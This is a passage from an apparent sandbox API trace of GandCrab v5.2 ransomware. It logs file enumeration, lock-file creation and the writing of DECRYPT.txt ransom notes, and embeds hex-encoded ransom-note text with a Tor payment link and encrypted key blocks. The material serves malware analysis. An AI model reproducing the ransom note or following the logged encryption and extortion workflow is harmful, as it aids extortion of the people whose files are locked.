47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.055] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0095.056] CloseHandle (hObject=0x230) returned 1 [0095.056] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.057] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.057] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x171)) [0095.057] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.057] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.057] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.057] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\d2ca4a09d2ca4deb61a.lock") returned 53 [0095.057] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Recent\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\recent\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0095.058] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.058] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.058] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Recent\\") returned 29 [0095.058] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Recent\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Recent\\*" [0095.058] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Recent\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.058] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Recent\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0095.058] CloseHandle (hObject=0x230) returned 1 [0095.059] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0095.059] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0095.059] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0095.059] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="Saved Games" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games" [0095.059] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\" [0095.059] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.059] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.059] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.059] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.060] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.060] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.060] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.060] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\\\TITWMVJL-DECRYPT.txt") returned 55 [0095.060] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Saved Games\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\saved games\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0095.061] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x6